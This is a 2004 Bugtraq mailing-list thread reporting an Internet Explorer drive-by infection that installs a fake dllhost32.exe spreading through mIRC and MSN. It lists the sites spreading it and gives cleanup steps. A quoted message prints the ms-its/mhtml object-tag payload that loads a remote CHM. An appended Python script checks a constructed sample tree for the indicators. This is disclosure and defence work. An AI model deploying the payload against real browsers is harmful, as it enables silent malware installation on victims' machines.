-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

i've seen this vuln being exploited on the following urls

*brasky.com*
*ilwig.net/rofl.swf*
*sillyu.afraid.org*
*preview.ampuh.info*
*just4fun.afraid.org*
*nowim.4t3.com*
*goten007.cjb.net*

depending on what version of windows you run, you may also need to remove other files (ie - c:\windows\prefetch\dllhost32.exe*, and possibly from dllcache). you may have to delete these files in safe mode.

to quote rats:
"it's in remotes in mirc, and you delete dllhost32.exe in safemode. dllhost32.exe is a fake bin, the real one is dllhost.exe, and you delete 2 strings in regedit which shows dllhost32.exe "as" the real one and then you are done "

it also puts lines in mirc remote.ini

i have also been told of another possible variant, discussed here:
http://rentalforums.nuclearfallout.net/viewtopic.php?t=1040

Gavin

- --
In God we trust,
Everyone else must have an X.509 certificate.

- ----- Original Message -----
From: "Philip Barnham" <phycho@darktech.org.uk>
To: <bugtraq@securityfocus.com>
Sent: Monday, April 05, 2004 12:14 PM
Subject: Fw: new IE vurn

: hey guys, i think there's a new IE vuln going about, as i was told to visit
:
: <phy|lappy> wanna see my site? www.sillyu.afraid.org
: <aenigma> omg this is funny www.sillyu.afraid.org
: <phy|lappy> check me out!! www.preview.ampuh.info :D
: <bleefis> wanna see my site? www.preview.ampuh.info
:
: after visiting this site, i noticed "dllhost32.exe" in my system32
: directory, this is not picked up by any antivirus scanner. it advertises the
: website above in IRC and on msn, it then stops conversations on mirc
: appearing on your screen so you don't know there is any activity in any of
: the rooms
:
: after visiting this site, i did not get any warning from IE whatsoever, and
: i have all the latest microsoft security fixes installed.
:
: is this yet another security flaw in microsoft IE?.
:
: solution
:
: delete dllhost32.exe and restart mirc, everything appears to work fine.
:
: any information about this would be appreciated.
:
:
: <!-- VVZkV2RXSXpaeja1 -->
: <textarea style='display:none;' id='code'>
: <object
: data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/L OI.CHM
: ::/loi.htm" type="text/x-scriptlet"></object>
: </textarea>
:
: taken from http://users.volja.net/madbox/loi.htm (don't click it)
: looks like another hole in IE!.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.2

iQA/AwUBQHGQ+TJ2eyFxcwE8EQL1KgCgh5soGM4FzBq3Ncfe5Jgn7QtyynUAnRT8
x6z1BTuiuV33Yv0z4X3sijk7
=bk6S
-----END PGP SIGNATURE-----
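
Added example, not part of the thread or written by its posters: a triage check for the artefacts the messages above name, namely files called dllhost32.exe* under system32, prefetch and dllcache, and mIRC .ini lines that mention it. It assumes the lines added to remote.ini contain the fake file name or one of the advertised hosts; the function names and the sample directory tree are constructed for illustration.

```python
import os
import tempfile

# Strings from the thread: the fake binary name and two advertised hosts.
INDICATORS = ("dllhost32.exe", "sillyu.afraid.org", "preview.ampuh.info")
# Locations under the Windows directory that the thread mentions.
SUBDIRS = ("system32", "prefetch", os.path.join("system32", "dllcache"))


def find_fake_binaries(windows_root):
    """Paths whose name starts with dllhost32.exe (any case); covers prefetch entries too."""
    hits = []
    for sub in SUBDIRS:
        folder = os.path.join(windows_root, sub)
        if os.path.isdir(folder):
            hits += [os.path.join(folder, n) for n in os.listdir(folder)
                     if n.lower().startswith(INDICATORS[0])]
    return sorted(hits)


def find_ini_references(mirc_dir):
    """(file name, line number, indicator) for each .ini line containing an indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(mirc_dir):
        for name in sorted(f for f in files if f.lower().endswith(".ini")):
            with open(os.path.join(dirpath, name), encoding="latin-1") as fh:
                for number, line in enumerate(fh, start=1):
                    hits += [(name, number, i) for i in INDICATORS if i in line.lower()]
    return hits


def build_sample(root):
    """Constructed sample tree: a Windows directory and a mIRC directory (hypothetical)."""
    win, mirc = os.path.join(root, "windows"), os.path.join(root, "mirc")
    for sub in SUBDIRS:
        os.makedirs(os.path.join(win, sub))
    os.makedirs(mirc)
    for rel in ("system32/dllhost.exe", "system32/DLLHOST32.EXE", "prefetch/DLLHOST32.EXE-0000.pf"):
        open(os.path.join(win, *rel.split("/")), "w").close()
    with open(os.path.join(mirc, "remote.ini"), "w") as fh:
        fh.write("[script]\nn0=; constructed line: wanna see my site? www.SillyU.afraid.org\n")
    return win, mirc


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        win, mirc = build_sample(tmp)
        print(find_fake_binaries(win))
        print(find_ini_references(mirc))
```

The genuine dllhost.exe in the sample tree is not reported; the registry strings mentioned in the thread are not named there, so they are not checked.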